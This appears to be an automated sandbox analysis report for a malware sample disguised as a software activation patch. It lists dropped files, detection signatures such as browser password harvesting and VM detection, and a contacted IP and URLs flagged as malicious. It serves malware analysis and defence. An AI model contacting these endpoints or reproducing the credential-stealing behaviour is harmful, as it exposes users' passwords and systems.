behaviorgraph top1 signatures2 2 Behavior Graph ID: 679264 Sample: KbqArOlW06.exe Startdate: 05/08/2022 Architecture: WINDOWS Score: 60 40 Snort IDS alert for network traffic 2->40 42 Multi AV Scanner detection for domain / URL 2->42 44 Antivirus / Scanner detection for submitted sample 2->44 46 5 other signatures 2->46 7 KbqArOlW06.exe 4 2->7         started        process3 file4 22 A1Photo-&-Art-Enha...atch_Activation.exe, PE32 7->22 dropped 24 C:\Users\user\AppData\...\2.0.0-beta2.cps.exe, PE32 7->24 dropped 26 C:\Users\user\AppData\...\KbqArOlW06.exe.log, ASCII 7->26 dropped 10 2.0.0-beta2.cps.exe 20 7->10         started        15 A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe 2 7->15         started        process5 dnsIp6 38 51.195.166.178, 49778, 80 OVHFR France 10->38 28 C:\Users\user\AppData\...\vcruntime140.dll, PE32 10->28 dropped 30 C:\Users\user\AppData\LocalLow\sqlite3.dll, PE32 10->30 dropped 32 C:\Users\user\AppData\LocalLow\softokn3.dll, PE32 10->32 dropped 36 4 other files (none is malicious) 10->36 dropped 48 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 10->48 50 Query firmware table information (likely to detect VMs) 10->50 52 Tries to harvest and steal browser information (history, passwords, etc) 10->52 56 3 other signatures 10->56 34 A1Photo-&-Art-Enha...atch_Activation.tmp, PE32 15->34 dropped 54 Obfuscated command line found 15->54 17 A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp 3 10 15->17         started        file7 signatures8 process9 file10 20 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 17->20 dropped
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
51.195.166.178
 unknown France
16276 OVHFR true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://51.195.166.178/ true
  • 8%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
http://51.195.166.178/b6425a6ca38e36b1a195f6f3019a4b0a true
  • Avira URL Cloud: safe
 unknown